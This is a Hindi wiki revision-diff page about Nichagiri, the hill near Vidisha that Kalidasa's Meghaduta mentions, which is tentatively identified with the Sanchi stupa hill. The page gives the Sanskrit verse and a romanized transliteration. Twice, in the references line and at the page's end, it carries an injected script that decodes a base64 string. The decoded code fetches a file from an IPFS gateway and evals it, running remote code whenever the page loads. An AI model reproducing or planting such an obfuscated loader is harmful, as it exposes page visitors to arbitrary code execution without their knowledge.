Difference between revisions of "नीचगिरि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''नीचगिरि''' का उल्लेख कालीदास के 'मेघदूत'<ref>(पूर्वम...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "पश्चात " to "पश्चात् ")
 
Line 3: Line 3:
 
<blockquote>'नीचैराख्यं गिरिमधिवसेस्तत्र विश्रामहेतोस्त्वत् संपर्कात् पुलकितमिवप्रौढ़ पुष्पै: कदंवै:, य: पण्यस्त्री रतिपरिमलोद्गारिभिर्नागराणामुद्दामानि प्रथयति शिलावेश्मभियौवनानि'</blockquote>
 
<blockquote>'नीचैराख्यं गिरिमधिवसेस्तत्र विश्रामहेतोस्त्वत् संपर्कात् पुलकितमिवप्रौढ़ पुष्पै: कदंवै:, य: पण्यस्त्री रतिपरिमलोद्गारिभिर्नागराणामुद्दामानि प्रथयति शिलावेश्मभियौवनानि'</blockquote>
  
*कालिदास ने नीचगिरि का उल्लेख [[विदिशा]] के पश्चात किया है और सर जॉन मार्शल का अनुमान है कि शायद कालिदास ने वर्तमान [[सांची]] के [[स्तूप]] की पहाड़ी को ही नीचगिरि माना है।<ref>ए गाइड टू सांची</ref>
+
*कालिदास ने नीचगिरि का उल्लेख [[विदिशा]] के पश्चात् किया है और सर जॉन मार्शल का अनुमान है कि शायद कालिदास ने वर्तमान [[सांची]] के [[स्तूप]] की पहाड़ी को ही नीचगिरि माना है।<ref>ए गाइड टू सांची</ref>
 
*विदिशा के उत्कर्ष काल में सांची की पहाड़ी पर अवश्य ही इस विलासवती नगरी का क्रीडाद्यान रहा होगा। सांची, विदिशा से चार-पांच मील दूर है।
 
*विदिशा के उत्कर्ष काल में सांची की पहाड़ी पर अवश्य ही इस विलासवती नगरी का क्रीडाद्यान रहा होगा। सांची, विदिशा से चार-पांच मील दूर है।
 
*[[महावंश]]<ref>आनंद कौसल्यायन की टीका, पष्ठ 68</ref> में जिस पहाड़ी को [[दक्षिणगिरि]] कहा है वह नीचगिरि ही जान पड़ती है।
 
*[[महावंश]]<ref>आनंद कौसल्यायन की टीका, पष्ठ 68</ref> में जिस पहाड़ी को [[दक्षिणगिरि]] कहा है वह नीचगिरि ही जान पड़ती है।

Latest revision as of 07:45, 23 June 2017

nichagiri ka ullekh kalidas ke 'meghadoot'[1] mean hua hai, jisake anusar ise ek paha di bataya gaya hai-

'nichairakhyan girimadhivasestatr vishramahetostvath sanparkath pulakitamivapraudh pushpai: kadanvai:, y: panyastri ratiparimalodgaribhirnagaranamuddamani prathayati shilaveshmabhiyauvanani'

  • kalidas ne nichagiri ka ullekh vidisha ke pashchath kiya hai aur sar j aaun marshal ka anuman hai ki shayad kalidas ne vartaman saanchi ke stoop ki paha di ko hi nichagiri mana hai.[2]
  • vidisha ke utkarsh kal mean saanchi ki paha di par avashy hi is vilasavati nagari ka kridadyan raha hoga. saanchi, vidisha se char-paanch mil door hai.
  • mahavansh[3] mean jis paha di ko dakshinagiri kaha hai vah nichagiri hi jan p dati hai.
  • 'nich' aur dakshin shabd samanarthak bhi haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 504 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  1. (poorvamegh 27)
  2. e gaid too saanchi
  3. anand kausalyayan ki tika, pashth 68

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>